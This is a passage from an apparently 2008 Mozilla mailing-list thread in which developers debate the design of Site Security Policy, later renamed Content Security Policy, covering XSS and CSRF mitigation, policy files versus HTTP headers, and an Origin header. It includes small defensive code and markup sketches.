implemented the shouldLoad method of the nsIContentPolicy interface
(and just checked for TYPE_SCRIPT) instead of attempting to parse to
find the <script> tags. This interface also allows you to easily
implement enforcement of the other headers involved in your proposal.
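
A very rough sketch of the idea (component registration is omitted and
the whitelist check is a placeholder, not real code from either project):

const CI = Components.interfaces;
var sspContentPolicy = {
  shouldLoad: function (contentType, contentLocation, requestOrigin,
                        context, mimeTypeGuess, extra) {
    if (contentType == CI.nsIContentPolicy.TYPE_SCRIPT &&
        !policyAllowsScriptHost(contentLocation.host)) {
      return CI.nsIContentPolicy.REJECT_SERVER;   // block the script load
    }
    return CI.nsIContentPolicy.ACCEPT;
  },
  shouldProcess: function () {
    return CI.nsIContentPolicy.ACCEPT;
  }
};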

In conclusion: we need to make sure that SSP benefits developers who
are not security conscious (because that is where SSP will prevent the
most vulnerabilities). While the temptation is there to assume the
developer will code securely, that assumption is the whole reason we
have XSS and XSRF in the first place.

bsterne
Jul 11, 2008, 6:51:20 PM
On Jun 25, 5:22 am, Gervase Markham <g...@mozilla.org> wrote:
> The documentation for Request-Source is now more complete, but it's a
> bit jumbled. I would make bullet 4 into bullet 2, and remove the second
> sentence because it's repeated in (new) bullet 3.

Good points. I'll make these changes.

> You didn't include the feature of a special value for the local domain.

> I note that in Content-Restrictions, I used "this":

Another good point. I prefer the use of "this" over the other
suggestion of "localhost" since the latter could create ambiguity
between the server the content came from and the user's local
machine. I'll add "this" to the proposal as well.

> We might also consider a special value for Script-Source of "head", if
> we are looking for ways to make it more palatable and
> easily-implementable for web authors.

I agree that it may be more palatable for authors, but it may come at
the expense of 1) security: while it is far less likely to find an
injection point in the <head> of a document, it is still possible, and
2) clarity of the new model: telling people to "move all your scripts
to external JS files" is a fairly large change to make, but it is
clear that anything remaining will not be executed. It also fits
nicely with the philosophy of separating behavior from content
structure. Telling people to "move all your scripts to external JS
files or the <head> of your document", while satisfying the behavior-
content separation, may potentially confuse people as to _why_ they
are separating their scripts. I am open to this, though, if others
feel it might be valuable.

> You may want to consider rethinking the names of the headers. At the
> moment, you would expect Script-Source and Request-Source to be
> parallel, but in fact Script-Source does something very similar to
> Request-Target, but just for script.

Agreed. I have been talking with Dan Veditz about this topic, and
there are some substantive changes and additions that need to be made
to the header names. I will likely follow-up with a separate post on
that topic since it could become rather lengthy.

> We do need to continue to think about the performance impact of
> Request-Source/Request-Origin.

True, and I'm hoping we can leverage some wisdom from the Access
Control specification regarding how to minimize performance overhead.
I know that spec is still in flux, though, and I'm paying attention to
the mailing list to track their progress.

> One option would be to have the site able
> to return a policy file in the body of the response to a HEAD request,
> which would define policy for that request and the entire site as well.
> This avoids the "well-known URL" problem, and gives the option of both
> page-specific responses and a general response.

I like the idea of being able to send "meta-policy" for a set of
resources larger than 1 to cut down on round-trips, etc. Is your
suggestion that the policy query return the meta-policy in the
response itself, or that it return a URL to a meta-policy file? I
think I would tend to favor the latter.

> It's not quite that simple. See the quirksMode.org page on inline event
> handlers: http://www.quirksmode.org/js/events_early.html
>
> If you want to permit suppression of the default action using an inline
> style, you may need to allow at least "return functionWithNoParams()".
> There are other ways to prevent the default action, but this one is
> quite familiar to people.
>
> Also, people often want to pass "this" or "event" to their event
> handlers so they know which item was clicked on or have access to event
> properties. More info on the latter here: http://www.quirksmode.org/js/events_access.html
>
> It's beginning to look like this might not fly...

All good points. Calling only zero-parameter functions appears to be
less useful than I originally thought. We will probably have to scrap
that idea.

As I mentioned, I have a set of changes that I need to make to the
proposal which I'll work on over the weekend and will follow up with
another post when I've collected my thoughts a bit more.

Regards,
Brandon

bsterne
Jul 11, 2008, 7:16:40 PM
On Jul 10, 8:47 am, glenn.wurs...@gmail.com wrote:
> The problem is that although solutions exist
> to both of these problems, developers have not properly implemented
> the solution.  With your approach of SSP and safe requests, you are
> again relying on the developer to use the solution correctly, and put
> all modifications behind a POST request.  You have not removed the
> reliance on the developer to code correctly, just simply shifted it to
> a different 'thing' that they have to do.

Perhaps I am misunderstanding this point. Are you suggesting that an
ideal model wouldn't require that web developers do anything
differently than they currently are? Site Security Policy is intended
to be a belt-and-suspenders tool to protect sites and users, but we
are still advocating that developers keep their web applications free
of vulnerabilities.

> From previous conversation
> with Terri, asking for an example of where a GET request can be used
> to effect change on a website is asking for us to find a security
> vulnerability in a website, since this is basically the definition of
> an XSRF. Large sites are going to be well protected against this type
> of thing, but I'm sure if you look at any of the recent CERT
> vulnerabilities regarding XSRF or XSS you'll notice that they are all
> exploitable through GET requests.

The restriction of CSRF protection to POST was not because we think
CSRF isn't common via GET; it is because cross-site GETs are possible,
and legitimately used, in too many ways to make mitigating them
worthwhile.

Evert | Rooftop
Jul 12, 2008, 1:35:25 PM
Sorry if this was already brought up in this thread (or if it's a
closed subject), but using headers rather than a policy file is a bad
idea, for the following reasons. A policy file:

* Allows caching
* Allows usage of the policy on a site where there's no scripting
available (static content servers?)
* Allows a policy to be enforced at the domain level, instead of for
every HTML page
* Removes the HEAD-before-POST requirement

The last one is important for a different reason as well. PHP,
as an example, will execute scripts the same way regardless of whether
it's HEAD, POST or GET, so this could produce unwanted results on
existing sites, not to mention a bandwidth and time overhead.

Terri
Jul 14, 2008, 4:45:11 PM
On Jul 11, 7:16 pm, bsterne <bste...@mozilla.com> wrote:
> Perhaps I am misunderstanding this point.  Are you suggesting that an
> ideal model wouldn't require that web developers do anything
> differently than they currently are?  Site Security Policy is intended
> to be a belt-and-suspenders tool to protect sites and users, but we
> are still advocating that developers keep their web applications free
> of vulnerabilities.

In an ideal world, we wouldn't have attackers, and all code would be
functional, elegant and secure. ;) But we know how that goes...

Right now, a web developer who is willing to re-architect a site could
take advantage of existing mashup work to produce more secure code.
For example, they might look at the ways of isolating code used in
Subspace [1] or SMash [2] that work in an unmodified browser. Or they
could look towards enhanced-browser solutions like the <sandbox>
abstractions of MashupOS [3][4]. Plus there are input-checking tools
and data-tainting tools that can provide further protection.

The target market, as it were, for a "belt-and-suspenders" sort of
approach is probably not the people who have the time and skill to
rework an entire web application. Those people already have tools.
They might like to have better ones, but for the amount of effort
involved they probably want much more than a belt-and-suspenders level
of additional security.

The people who could benefit most from SSP are those who are
interested in additional security, but don't have the time (or
possibly the skills) for full audits of existing code. System
administrators who want to minimize risk to their servers. People who
have installed blogging/webmail/etc. software on their websites and
want additional security guarantees. Companies who feel they're at
high risk of people trying to do cross-site request forgery on their
sites and don't want a typo in input-checking to result in upset
customers.

Right now, these people could use a tool to help them enforce security
policies with relatively minimal effort, which is pretty much what SSP
is. But they'd benefit a lot more if it weren't necessary to also re-
architect their sites to ensure that they get the most out of SSP!

[1] http://www.collinjackson.com/research/papers/fp801-jackson.pdf
[2] http://domino.research.ibm.com/library/cyberdig.nsf/1e4115aea78b6e7c85256b360066f0d4/0ee2d79f8be461ce8525731b0009404d?OpenDocument
[3] http://www.usenix.org/event/hotos07/tech/full_papers/howell/howell_html/
[4] http://research.microsoft.com/~helenw/papers/sosp07MashupOS.pdf

Gervase Markham
Jul 16, 2008, 2:23:55 PM
glenn....@gmail.com wrote:
> In terms of the safe vs. unsafe requests, perhaps I can lend some
> insight. The whole reason we have these XSS and XSRF attacks in the
> first place is because developers have messed up.

I agree - but this is because what they are asked to do is hard. There
are two things we can do about that - we can make the thing they are
trying to do easier, or we can provide another easier thing they can do
as well, which helps when they get the first thing wrong. That's the
approach we are taking.

> XSS 'can' be solved
> by proper input validation, and XSRF attacks 'can' be solved by using
> random identifiers in the links that perform an operation or examining
> the Referer HTTP header.

Note that Referer checking is not a solution, a) because it's optional
for privacy reasons, and b) because there are existing ways to fake one
(e.g. using Flash, I believe).

> the solution. With your approach of SSP and safe requests, you are
> again relying on the developer to use the solution correctly, and put
> all modifications behind a POST request. You have not removed the
> reliance on the developer to code correctly, just simply shifted it to
> a different 'thing' that they have to do.

Indeed. But there are multiple good reasons to put modifications behind
a POST request, including existing browser behaviour preventing
resubmission of POSTs. So it's something they may already be doing anyway.

> Related to the POST vs. GET arguments above is the fact that the only
> way of doing a POST request currently is by submitting a form. While
> browsers have gotten better at being able to customize the appearance
> of a submit button, they are still in no way perfect, and hence some
> of the visual style approaches that are possible on things like
> <a>...</a> are not possible on the <input> submit element. The re-
> arranging of the text (going from between the opening and closing <a>
> element to inside the value attribute of the input element) also
> contains several restrictions. A lot of HTML is usable inside the <a>
> and </a> but only plain-text is allowed inside the value attribute of
> the input element.

That's why we have the <button type="submit"> element, which allows
arbitrary HTML inside it.
http://htmlhelp.com/reference/html40/forms/button.html
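
E.g. (markup illustrative only):

<button type="submit"><img src="cart.png" alt="">Add to cart</button>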

Gerv

Glenn Wurster
Jul 17, 2008, 3:41:47 PM
> I agree - but this is because what they are asked to do is hard. There
> are two things we can do about that - we can make the thing they are
> trying to do easier, or we can provide another easier thing they can do
> as well, which helps when they get the first thing wrong. That's the
> approach we are taking.

Yes, both approaches attempt to make things easier as well. The
question is "how much easier do you want to make it?" SSP indeed does
make it easier to protect against XSRF by blocking cross-site POST
requests. Things would be even easier if SSP applied universally
(including GET requests) instead of only in certain circumstances.

> > XSS 'can' be solved
> > by proper input validation, and XSRF attacks 'can' be solved by using
> > random identifiers in the links that perform an operation or examining
> > the Referer HTTP header.
>
> Note that Referer checking is not a solution, a) because it's optional
> for privacy reasons, and b) because there are existing ways to fake one
> (e.g. using Flash, I believe).

Which still leaves random identifiers... (but this is getting off-
topic).

> Indeed. But there are multiple good reasons to put modifications behind
> a POST request, including existing browser behaviour preventing
> resubmission of POSTs. So it's something they may already be doing anyway.

Browsers preventing resubmission is only an issue for non-idempotent
requests (and even then, non-idempotent requests have been done over
GET).

The problem in this discussion is we are debating a point based on a
very one-sided view of the problem and what developers are capable
of. We know that the problem exists, and we know what developers need
to do in order to fix the problem. We can argue for a very long time
as to the merits of whether or not to protect GET, but the real kicker
will be whether or not the solution ends up helping. The same is true
for the argument of always doing operations over POST - we can argue
for a while but it's all about what developers are actually doing.
With POST, I think that the evidence points towards the fact that
developers perform operations through GET, even though the HTTP spec
suggests otherwise.

> That's why we have the <button type="submit"> element, which allows
> arbitrary HTML inside it. http://htmlhelp.com/reference/html40/forms/button.html

Learn something new every day. Did not know about that one. Thanks.

On another note, there is the issue of policy files vs. headers.
Evert has expressed a preference for policy files (in this discussion)
and I tend to agree with him - our work used policy files. Adobe
used policy files for Flash. Work by Justin Schuh also used policy
files (see http://taossa.com/index.php/2007/02/17/same-origin-proposal/
- this gives another related proposal). I think, especially with
reference to Request-Source, that getting rid of the header and using
a policy file would be a good idea.

Glenn.

bsterne
Aug 15, 2008, 1:03:59 PM

Hi Evert,

I appreciate your comments and I am working hard on a set of changes
to the proposal based on a lot of feedback I've received both on the
newsgroup and in private communications. These changes, I think,
encompass the comments you made.

First, we do plan to support both HTTP headers as well as files for
policy transmission. That request has come from a number of people,
so it seems wise to give the people what they want :-) I am working
hard on modifying the proposal document to include these changes which
are fairly broad. I will spare most of the details now and will post
to the newsgroup when those changes have been published.

With regard to your last comment (re: PHP treating all requests
equally), I don't think that's quite accurate. Applications written
using the $_REQUEST super-global will suffer from that, but using
$_REQUEST only is not a best practice and most web applications should
reasonably be expected to differentiate POST, GET, and HEAD. However,
this point may be moot as we are starting to consider other options
for CSRF protection rather than the pre-flight requests originally
proposed. It may be the case that adding such policy requests for all
cross-site POSTs will have too high an impact on bandwidth, round
trips, etc.

Jackson, Barth and Mitchell have written a paper regarding CSRF
protection that utilizes a new HTTP header, Origin:
http://crypto.stanford.edu/websec/csrf/

An Origin header has also been proposed in the W3C's Access-Control
spec. I would be happy to hear feedback on utilizing this model
instead of the browser-based ingress/egress filtering model which was
originally proposed. In my opinion, it has several benefits, most
notably: 1) ease of implementation for user agents, and 2) it adds no
additional round trips and minimal additional bandwidth. It will also
be consistent with the Access-Control spec.
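
To illustrate (host names are examples only): for a cross-site POST from
a page on evil.example to bank.example, the browser would attach a header
along the lines of

Origin: http://evil.example

and bank.example could then refuse state-changing requests whose Origin
it does not recognize.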

Thoughts?

-Brandon

bsterne
Sep 5, 2008, 7:19:29 PM
I have updated the proposal document to reflect the changes I
mentioned briefly before. Chief among them are:

1. The name has been changed to Content Security Policy, mainly
because the mechanism describes security policies applied to
individual _resources_ and not entire websites. The change is
intended to reduce confusion.
2. The scope of the proposal has been reduced to just XSS
mitigations. We are now recommending the implementation of the Origin
header to address CSRF.
3. The policy syntax has been expanded to address a greater number of
types of content (not just script).

You can view the updated proposal here:
http://people.mozilla.org/~bsterne/content-security-policy

Cheers,
Brandon
